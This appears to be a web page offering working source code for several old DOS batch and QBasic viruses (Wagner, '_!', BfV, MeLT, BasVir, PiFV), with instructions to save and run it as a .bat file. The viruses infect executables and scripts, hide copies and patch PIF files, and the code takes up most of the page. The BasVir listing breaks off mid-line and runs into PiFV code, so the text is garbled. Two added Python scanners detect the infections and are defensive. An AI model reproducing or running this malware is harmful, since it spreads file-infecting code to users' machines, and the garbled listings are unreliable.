
Batch Virus Code

Let's get straight to it.
Copy all of the code below into Notepad, then save it in ".bat" format.

The Wagner Virus





--------------------------------Code-------------------------------


@echo off


ctty nul


rem ______________________________________________________________


rem :Wagner Virus, as presented in Virology 101 (c) 1993 Black Wolf


rem :This virus can be cured simply by typing "attrib -h -r *.*" in



rem :infected directories and deleting BAT files that are identical


rem :to this code, then rename the files having a "V" at the start


rem :to their original names. NOTE: Does not infect COMMAND.COM.


rem :______________________________________________________________


for %%f in (*.exe *.com) do set A=%%f


if %A%==COMMAND.COM set A=


rename %A% V%A%


if not exist V%A% goto end



attrib +h V%A%


copy %0.bat %A%


attrib +r %A%


ren %A% *.bat


set A=


:end


ctty con


@if exist V%0.com V%0.com %1 %2 %3


@if exist V%0.exe V%0.exe %1 %2 %3



----------------------------End of Code----------------------------
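The header comments above describe the on-disk layout to look for when cleaning up: a BAT file next to a hidden program whose name has a "V" in front, with the BAT copies identical to one another. The following read-only check for that layout is an added example, not code from the original page; the function names and the sample directory are constructed for illustration.

```python
import hashlib
import os
import tempfile

def find_wagner_pairs(directory):
    """Find NAME.BAT files sitting next to VNAME.EXE / VNAME.COM, the layout
    the sample's header says to look for. Read-only: nothing is changed."""
    names = {n.upper(): n for n in os.listdir(directory)}
    findings = []
    for upper in sorted(names):
        stem, ext = os.path.splitext(upper)
        if ext != ".BAT":
            continue
        for host_ext in (".EXE", ".COM"):
            displaced = names.get("V" + stem + host_ext)
            if displaced is None:
                continue
            with open(os.path.join(directory, names[upper]), "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            findings.append({"bat": names[upper], "displaced": displaced,
                             "restore_as": displaced[1:], "sha256": digest})
    return findings

def identical_bat_groups(findings):
    """Group flagged BAT files by content hash. The header notes the copies
    are identical, so a hash shared by several pairs is the stronger signal."""
    groups = {}
    for f in findings:
        groups.setdefault(f["sha256"], []).append(f["bat"])
    return [bats for bats in groups.values() if len(bats) > 1]

def build_constructed_sample():
    """Constructed test directory with inert placeholder contents."""
    root = tempfile.mkdtemp(prefix="wagner_demo_")
    files = {"GAME.BAT": b"placeholder-A", "VGAME.EXE": b"orig",
             "EDIT.BAT": b"placeholder-A", "VEDIT.COM": b"orig",
             "VIDEO.BAT": b"legit batch", "NOTES.TXT": b"text"}
    for name, data in files.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    return root

if __name__ == "__main__":
    for hit in find_wagner_pairs(build_constructed_sample()):
        print(hit["bat"], "<->", hit["displaced"], "restore as", hit["restore_as"])
```

A lone pair can be a coincidence of naming (VIDEO.BAT in the sample is not flagged because no VVIDEO program exists); several pairs sharing one hash is what matches the header's description.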





2-

Batch virus "_!"
----------------

Infects parent and current directories
Virus code is appended to the host batch
Only works if host is in current directory
Infects just one batch unless new clean batches are added

This is a very simple batch virus. When it runs it appends its code
to another batch file in the parent or current directory. It is not
very effective but illustrates the basics.





----------------------------(cut here)------------------------------------


@ctty nul._!



for %%a in (*.bat ..\*.bat) do set _!=%%a


find "_!"<%_!%


if errorlevel 1 find "_!"<0>>%_!%


ctty con._!


----------------------------(cut here)-----------------------------------





3-

Batch virus "BfV"
-----------------

Creates the hidden file "_BFV" in the root directory of drive C
Infects one batch per run in current and parent directories
Gives up after encountering seven infected batches
Virus code is appended to the host batch

This is an improved appender. It only has to be run from its own directory
once to enable it to reproduce even when the host is in a path directory.
To avoid slowing batch files down too much it exits if it can't infect
after checking seven batch files. If the host batch ends with nul characters
it removes them so the virus code will run.





----------------------------(cut here)------------------------------------


@echo off%[BfV_B]%


if '%1=='## goto BfV_%2



if exist C:\_BfV.bat goto BfV_


if not exist %0.bat goto BfV_end


find "BfV"<0>C:\_BfV.bat


attrib C:\_BfV.bat +h


:BfV_


command /e:5000 /c C:\_BfV ## run


goto BfV_end



:BfV_run


for %%i in (*.bat ..\*.bat) do call C:\_BfV ## inf %%i


exit BfV


:BfV_inf


if '%BfV%=='1111111 exit


set BfV=%BfV%1


find "BfV"<3>nul


if not errorlevel 1 goto BfV_end



type %3>BfV


type C:\_BfV.bat>>BfV


move BfV %3>nul


exit BfV


:BfV_end


----------------------------(cut here)------------------------------------


4-

Batch virus "MeLT"
------------------

Creates the hidden file "MELT_2A" in the temp directory
Infects files in the current, parent and all path directories
Infects one batch per run if less than ten infected files encountered
After detecting ten infected files it displays a graphics screen effect
Adds one line before the host batch and appends the rest
Will not run if attached to AUTOEXEC.BAT (but infects it)

This batch virus is much more advanced. It takes control from the host
immediately, runs the virus then runs the host batch. The host is run in
such a way as to disable the virus until the host is completely finished
to avoid slowing down batch files that call themselves in a loop. Simple
appenders are very obvious when on such files, but this one causes no
significant speed loss except at startup. This virus carries a harmless
payload which is assembled with the debug command - it 'melts' the screen
in a flash of color then returns it to normal before running the host.





----------------------------(cut here)------------------------------------


@if not '%0==' if '%_melt%==' goto meltbeg


::---- dummy host --------


@echo off


echo Hello World!


::---- end dummy host ----





@goto MeLTend [MeLT_2a]


:MeLTbeg


@echo off%_MeLT%


if '%1=='MeLT goto MeLT%2


if not exist %comspec% set comspec=%_MeLT%command


%comspec% /e:5000 /c %0 MeLT vir


set MeLTcl=%1 %2 %3 %4 %5 %6 %7 %8 %9


call %0 MeLT rh



set _MeLT=


set MeLTcl=


goto MeLTend


:MeLTrh


set _MeLT=x


%0 %MeLTcl%


:MeLTvir


set MeLTH=%0



if not exist %_MeLT%%temp%\nul set temp=%tmp%


if exist %temp%\MeLT_2a goto MeLTrun


%0 MeLT fnd . %path%


:MeLTfnd


shift%_MeLT%


if '%2==' exit MeLT


set MeLT=%2\%MeLTH%.bat


if not exist %MeLT% set MeLT=%2\%MeLTH%


if not exist %MeLT% set MeLT=%2%MeLTH%.bat



if not exist %MeLT% set MeLT=%2%MeLTH%


if not exist %MeLT% goto MeLTfnd


find "MeLT"<MeLT>%temp%\MeLT_2a


attrib %temp%\MeLT_2a +h


:MeLTrun


%MeLTH% MeLT s . .. %path%


:MeLTs



shift%_MeLT%


if '%2==' exit MeLT


for %%a in (%2\*.bat %2*.bat) do call %MeLTH% MeLT inf %%a


goto MeLTs


:MeLTinf


find /i "MeLT"<3>nul


if not errorlevel 1 goto MeLTno


echo @if not '%%0==' if '%%_melt%%==' goto meltbeg>MeLT.t



type %3>>MeLT.t


echo.>>MeLT.t


type %temp%\MeLT_2a>>MeLT.t


move MeLT.t %3>nul


exit MeLT


:MeLTact - flash-melt screen text then put back to normal



echo e 100 BA D0 07 BB 00 B8 8E C3 8B CA 33 FF 26 8B 05 FE>MeLT.t


echo e 110 C0 FE C4 26 89 05 47 47 E2 F2 FE 06 24 01 75 E8>>MeLT.t


echo e 120 B4 4C CD 21 00>>MeLT.t


echo g>>MeLT.t


debug<MeLT>nul


del MeLT.t



exit MeLT


:MeLTno


set MeLTC=%MeLTC%1


if %MeLTC%==1111111111 goto MeLTact


:MeLTend


----------------------------(cut here)------------------------------------









5-

QBasic virus "BasVir"
---------------------

Infects one BAS file in the current directory per run
Inserts its code in front of the host so it will run first
Does not infect QBasic programs that contain "DECLARE"
Really a batch virus that hides in BASIC code
If the host is renamed the virus won't work

I wrote this in response to someone's request on the net for a virus
written in BASIC. I hope they don't mind if the BASIC program makes
a batch and runs it. It stays out of programs that use procedures to
avoid causing errors, such programs cannot tolerate prepended code.
This is really a joke, but it's a QBasic virus (no? you write one.)

The following must be named BASVIR.BAS to function.





----------------------------(cut here)------------------------------------


basvirH$ = "BASVIR.BAS"


OPEN "~$.bat" FOR OUTPUT AS #2: REM BasVir


PRINT #2, "@echo off %BasVir1%"


PRINT #2, "if '%1=='BasVir goto BasVir%2"


PRINT #2, "for %%a in (*.bas) do call ~$ BasVir 2 %%a"


PRINT #2, "exit": REM BasVir


PRINT #2, ":BasVir2"



PRINT #2, "find "; CHR$(34); "DECLARE "; CHR$(34); "<3>nul": REM BasVir


PRINT #2, "if not errorlevel 1 goto BasVirE"


PRINT #2, "echo basvirH$ = "; CHR$(34); "%3"; CHR$(34); ">~1": REM BasVir


PRINT #2, "find "; CHR$(34); "BasVir"; CHR$(34); "<basvirH>nul


if exist PiFV! del PiFV!


:: run the host



set PiFVcl=%1 %2 %3 %4 %5 %6 %7 %8 %9


call %0 PiFV hst


set PiFVo=


set PiFVcl=


:: check for activation...


echo.|date|find /i "sat">nul.PiFV


if errorlevel 1 goto PiFV_end


echo.|time|find "7">nul.PiFV



if errorlevel 1 goto PiFV_msg


set PiFV=echo


cls%_PiFV%


%PiFV%.


%PiFV% There once was an Otter named Oscer


%PiFV% Who claimed to know how to make water.


%PiFV% "No more dams," he said, "use my water instead!"


%PiFV% But the Elder Otter was not impressed.



pause>nul.PiFV


set PiFV=


goto PiFV_end


:PiFV_msg


echo [PiFV] by WaveFunc


goto PiFV_end


:PiFV_hst


%PiFVo% %PiFVcl%



goto PiFV_end


:PiFV_go


set PiFVh=%0


if not exist %PiFVh% set PiFVh=%0.bat


if not exist %PiFVh% exit


for %%a in (*.pif) do call %0 PiFV inf %%a


exit PiFV


:PiFV_inf


set PiFVp=%3



:: get victim filename and infection marker


:: from PIF file using debug...


if exist PiFV! goto PiFV_1


echo m 124,162 524>PiFV!


echo e 100 '@set fn='>>PiFV!


echo m 524,562 108>>PiFV!


echo n pifv$.bat>>PiFV!



echo rcx>>PiFV!


echo 47>>PiFV!


echo w>>PiFV!


echo m 55E,561 108>>PiFV!


echo e 10C 0>>PiFV!


echo n pifv$$.bat>>PiFV!



echo rcx>>PiFV!


echo 10>>PiFV!


echo w>>PiFV!


echo q>>PiFV!


:PiFV_1


debug %PiFVp%<PiFV>nul



call PiFV$


set PiFVn=%fn%


call PiFV$$


set PiFVi=%fn%


del PiFV$?.bat


:: pifvn=orig filename


:: pifvi=infection marker


:: pifvp=pif filename



:: pifvh=companion bat file


:: skip infected or 'empty' pifs...


if '%PiFVi%=='PiFV goto PiFV_end


if '%PiFVn%==' goto PiFV_end


:: don't shadow command.com (be nice)


echo %PiFVn%|find /i "command">nul


if not errorlevel 1 goto PiFV_end


:: infectable - create a companion batch...



:: (the following code strips off the extension)


echo e 100 e8 16 00 b4 08 cd 21 3c 00 74 0c 3c 2e 74 08 88>PiFV$$


echo e 110 c2 b4 02 cd 21 eb ec cd 20 ba 21 01 b4 09 cd 21>>PiFV$$


echo e 120 c3 73 65 74 20 66 6e 3d 24 00>>PiFV$$


echo n pifv$.com>>PiFV$$


echo rcx>>PiFV$$



echo 2a>>PiFV$$


echo w>>PiFV$$


echo q>>PiFV$$


debug<PiFV>nul


echo %PiFVn%|PiFV$>PiFV$$.bat


call PiFV$$



set PiFVb=%fn%.bat


del PiFV$?.*


:: pifvb=new batch name


:: do not shadow if comp has same name as host


if %PiFVo%==%PiFVb% goto PiFV_end


if exist %PiFVb% goto PiFV_end


echo @echo off>%PiFVb%


echo set pifvo=%pifvn%>>%PiFVb%



find "PiFV"<PiFVh>>%PiFVb%


attrib %PiFVb% +h


:: ...and point the PIF at the companion


echo e 15E 'PiFV',0>PiFV$$


echo e 124 '%PiFVb%',0>>PiFV$$


echo w>>PiFV$$



echo q>>PiFV$$


debug %PiFVp%<PiFV>nul


del PiFV$$


:: I think we're done!


exit PiFV


:PiFV_end


:: wonder how many bugs all this has in it? Only one



:: way to find out...
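Each sample above looks for its own marker string in a candidate host and skips files that already carry it, and two of them keep a hidden copy under a fixed name. The scanner below uses those same strings and names for detection; it is an added example, not code from the original page, and its function names and sample tree are constructed for illustration.

```python
import os
import tempfile

# Marker strings from the page: each sample searches a candidate host for its
# own marker and skips files that already contain it. Value = ignore case
# (the MeLT sample uses "find /i"; the others use plain, case-sensitive find).
MARKERS = {"_!": False, "BfV": False, "MeLT": True, "BasVir": False, "PiFV": False}
# Names of the hidden copies the page says two samples drop (compared lowercased).
ARTIFACTS = {"_bfv.bat", "melt_2a"}
SCAN_EXTS = {".bat", ".bas"}

def markers_in(path):
    """Return {marker: [line numbers]} for each marker present in one file."""
    hits = {}
    with open(path, "r", encoding="latin-1") as fh:
        for lineno, line in enumerate(fh, 1):
            for marker, ignore_case in MARKERS.items():
                found = (marker.lower() in line.lower()) if ignore_case else (marker in line)
                if found:
                    hits.setdefault(marker, []).append(lineno)
    return hits

def scan_tree(root):
    """Walk root read-only; collect marker hits and dropped-artifact names."""
    report = {"marker_hits": {}, "artifacts": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in sorted(files):
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            if name.lower() in ARTIFACTS:
                report["artifacts"].append(rel)
            elif os.path.splitext(name)[1].lower() in SCAN_EXTS:
                hits = markers_in(full)
                if hits:
                    report["marker_hits"][rel] = hits
    return report

def build_constructed_tree():
    """Constructed sample tree; file bodies are inert text, not working code."""
    root = tempfile.mkdtemp(prefix="marker_demo_")
    samples = {"clean.bat": "@echo off\necho hi\n",
               "build.bat": "@echo off\necho done\nrem tail melt marker\n",
               "menu.bat": "@echo off\nrem BfV\nrem BfV again\n",
               "MeLT_2a": "dropped copy\n"}
    for name, text in samples.items():
        with open(os.path.join(root, name), "w", encoding="latin-1") as fh:
            fh.write(text)
    return root
```

The "_!" marker is only two characters and can occur in legitimate scripts, so a hit is a lead for manual review; the reported line numbers show whether the match sits in appended lines at the end of the file.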

